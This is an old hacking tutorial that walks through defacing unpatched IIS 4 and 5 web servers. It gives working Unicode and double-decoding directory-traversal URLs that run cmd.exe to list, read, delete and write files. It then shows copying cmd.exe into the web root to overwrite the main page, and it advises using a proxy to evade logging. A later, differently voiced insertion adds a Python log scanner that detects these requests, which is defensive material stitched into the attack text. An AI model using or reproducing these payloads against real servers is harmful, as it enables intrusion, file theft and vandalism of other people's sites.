All of this works on IIS 4 and 5 servers without any
security updates!
Made By Truti - maac@mail1.stofanet.dk
************ INTRO:
Hacking an IIS server is pretty much like taking candy from
a baby. No really, it's that easy. In this tutorial I'm going
to walk you through 0wnz'ing your very own IIS server and
show you how to deface the site, but I seriously don't
encourage this. I don't agree with needless defacing unless
it's your first time, but I'm not against defacing to stand up
for your rights, punish a site with bad intentions (even
though the site can be rebuilt) or to make a strong point.
If you're going to use the *I defaced your site because it
had bad security* excuse, you could just as easily mail the admin.
I'm telling you all how to do this so you know how easy it is.
Please don't abuse the information I give you.
---------------------------------------------
************ Finding vulnerable servers:
There are *many, many* vulnerabilities in IIS but I'm
going to discuss one of the latest. This vulnerability
allows the execution of arbitrary code.
To see if a site is vulnerable, try these links:
www.TARGET.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
www.TARGET.com/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
www.TARGET.com/cgi-bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
www.TARGET.com/samples/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
www.TARGET.com/iisadmpwd/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
www.TARGET.com/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
www.TARGET.com/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
www.TARGET.com/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
If the server is vulnerable you should get a listing of the
C drive.
If none of these links work, the server probably isn't
vulnerable.
Ok, so let's say you got a listing of the C drive's contents;
it should look something like:
---------------------------------------------
Directory of c:\
11/15/02 08:50a <DIR> WINNT
11/15/02 09:15a <DIR> Program Files
11/15/02 09:20a <DIR> TEMP
11/15/02 09:21a <DIR> CPQ SYSTEM
11/15/02 09:50a <DIR> Inetpub
11/27/02 08:11a <DIR> CPQSUPSW
11/29/02 09:12a <DIR> CA_LIC
12/01/02 09:42a 140 server ip address.txt
04/06/02 04:44p 55,769 systemlog 06-04.txt
05/04/02 12:32p <DIR> test
10 File(s) 1,159,703,933 bytes
1,322,123,264 bytes free
---------------------------------------------
To navigate, just change the end of the link. For example,
to list the WINNT directory:
/system32/cmd.exe?/c+dir+c:\winnt
To navigate to a folder with a long name such as CPQ SYSTEM
you would have to put: /system32/cmd.exe?/c+dir+c:\cpqsys~1
There must be six characters before the ~1 and no spaces
(normal DOS short-name rules). Practise in DOS on your own PC
(or wherever there is a Win32 b0x); this will greatly help you
when it comes to using simple commands such as copy, or
listing the contents of a directory.
Now, in order to find the main page of the website, we must
find the webroot. The webroot is the path in which all the
files for the site are held, including the main page. In my
experience the webroot is usually found on the D: drive but
it can be any directory the admin chooses.
Try: /system32/cmd.exe?/c+dir+d:\
This should list the contents of the D: drive. Also a
good tip: a lot of sites have *mock* webroots, where you
think you have found the site's main page but it's not really,
just a copy. You will have to visit the site and find the
size of the main page and the other pages linked to it
(right click and click Properties - normal Win32 trick) and
then match it up with the files in the webroot to find the
real main page.
---------------------------------------
Now is a good time to give you some commands that will come
in useful:
To list all files of a chosen type on the server use:
www.TARGET.com/whatever/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir%20/S%20c:\*.whatever
To DOWNLOAD a file use:
www.TARGET.com/whatever/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20type%20c:\whatever.file
When asked "What would you like to do with this file?"
choose *run this program from its current location*.
Choosing "save to disk" will get you a properties report of
that file or something like that.
To DELETE (del) a file use:
www.TARGET.com/whatever/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20del%20c:\whatever.file
To make a text file use:
www.TARGET.com/whatever/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20echo%20Your txt goes here!!!!!>%20test.txt
--------------------------------------
************ Changing the mainpage.htm
Now on to the important part, editing the website's main
page. HTML is not needed, but if you want an in any way
decent looking deface you need to know it. If you don't know
it, don't worry: any text in a file with a .htm or .html
extension will show up in a browser. If you want to learn
HTML it can be done by anybody; I learned the basics in
about 1 day. Ok, enough girlie talk, on to the man
stuff: you have to copy the file CMD.exe to the directory
with the page in it. Let's call this page
wannabie_admin.html and let's say the directory
wannabie_admin.html is in is C:\home\site.
So the COPY command:
www.TARGET.com/whatever/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20copy%20c:\winnt\system32\cmd.exe%20C:\home\site\CMD.exe
That will copy CMD.exe (like command.com in Win98) to
C:\home\site.
Now to paste the text we want into wannabie_admin.html:
www.TARGET.com/whatever/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/home/site/CMD.exe?/c%20echo%20Damn Wannabies! You run IIS and you just been cracked>%20wannabie_admin.html
Now your text should be on the main page. If you echo
HTML code into wannabie_admin.html, you'll get a much better
defacement. If you are going to do it, do it RIGHT!
--------------------------------------
Please, please listen to me: IIS servers >>>-LOG-<<< all
this stuff! So use a >>>-PROXY-<<<
or else pay the price!
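That warning is the defender's handle on this whole tutorial: every link earlier on the page leaves a line in the IIS W3C log, and the two encodings they rely on are easy to pick out. %255c is a percent-encoded %5c, so it only turns into a backslash if the server decodes the path a second time after its security check; %c0%af is an overlong two-byte UTF-8 spelling of / that a strict decoder rejects. The script below is an added example, not part of the original tutorial: it normalises the request path the way the vulnerable server effectively did, then flags double decoding, overlong separators, traversal out of the web root, and any call to cmd.exe (including a copy dropped inside the web root, as in the section above). The log excerpt is constructed for the example and assumes the W3C field layout given in its own #Fields: line; the client addresses are documentation ranges.

```python
import re
from urllib.parse import unquote_to_bytes

# Overlong two-byte UTF-8 forms of '/' (0x2F) and '\' (0x5C). A strict decoder
# rejects these; the vulnerable server accepted them as path separators.
OVERLONG = {b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\"}

# Constructed IIS 5.0 W3C extended log excerpt (not a real server's log). The
# request shapes mirror the tutorial: double-encoded and overlong traversal to
# cmd.exe, a copied cmd.exe called from the web root, and a single-encoded
# attempt that the server refused.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2002-12-01 09:42:10 192.0.2.10 GET /index.htm - 200
2002-12-01 09:42:15 192.0.2.10 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+dir+c:\\ 200
2002-12-01 09:42:33 192.0.2.10 GET /msadc/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe /c%20copy%20c:\\winnt\\system32\\cmd.exe%20c:\\inetpub\\wwwroot\\cmd.exe 200
2002-12-01 09:43:01 192.0.2.10 GET /cmd.exe /c%20echo%20cracked>%20default.htm 200
2002-12-01 09:45:00 198.51.100.7 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+dir 404
2002-12-01 09:50:00 203.0.113.5 GET /images/logo.gif - 200
"""


def canonicalize(raw: str, max_rounds: int = 3):
    """Percent-decode until the string stops changing, then map the overlong
    sequences to their ASCII separators. Returns (decoded_path, rounds_needed):
    a normal request needs 0 or 1 rounds; 2 or more means the client relied on
    the server decoding twice."""
    current = raw.encode("utf-8")
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote_to_bytes(current)
        if decoded == current:
            break
        current = decoded
        rounds += 1
    for seq, replacement in OVERLONG.items():
        current = current.replace(seq, replacement)
    return current.decode("latin-1"), rounds


def escapes_webroot(path: str) -> bool:
    """True if the '..' segments ever climb above the directory the path starts in."""
    depth = 0
    for segment in re.split(r"[\\/]+", path):
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        elif segment and segment != ".":
            depth += 1
    return False


def decode_query(query: str) -> str:
    """IIS logs cs-uri-query as sent; '+' and %20 both reach cmd.exe as spaces."""
    if query == "-":
        return ""
    return unquote_to_bytes(query.replace("+", " ")).decode("latin-1")


def analyze_request(stem: str, query: str) -> dict:
    """Return the canonical path, the findings for one request, and the
    command line handed to cmd.exe, if any."""
    path, rounds = canonicalize(stem)
    findings = []
    if rounds >= 2:
        findings.append("double-encoded path")
    if any(seq in stem.lower() for seq in ("%c0%af", "%c1%9c")):
        findings.append("overlong UTF-8 separator")
    if escapes_webroot(path):
        findings.append("traversal escapes web root")
    if path.lower().replace("\\", "/").endswith("/cmd.exe"):
        findings.append("cmd.exe invoked via web server")
    match = re.match(r"/c\s+(.*)", decode_query(query), re.IGNORECASE)
    command = match.group(1) if match else None
    return {"path": path, "findings": findings, "command": command}


def scan_log(text: str) -> list:
    """Walk a W3C extended log and return one record per suspicious request."""
    fields = None
    hits = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        record = dict(zip(fields, line.split()))
        result = analyze_request(record.get("cs-uri-stem", ""),
                                 record.get("cs-uri-query", "-"))
        if result["findings"]:
            hits.append({"c-ip": record.get("c-ip"),
                         "status": record.get("sc-status"), **result})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        line = f"{hit['c-ip']} {hit['status']} {hit['path']} -> {', '.join(hit['findings'])}"
        if hit["command"]:
            line += f" ; command: {hit['command']}"
        print(line)
```

Run it as a script to get one line per flagged request. The 404 hit is the single-encoded attempt the server refused; it still deserves an alert, because it tells you who is probing before they find an encoding that works, and the /cmd.exe hit with no traversal at all is the tell-tale of a cmd.exe copy already sitting in the web root.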
--------------------------------------
BTW, a very useful tool is Twwwscan... It can be
found via www.google.com!
Credits
Made By Truti - maac@mail1.stofanet.dk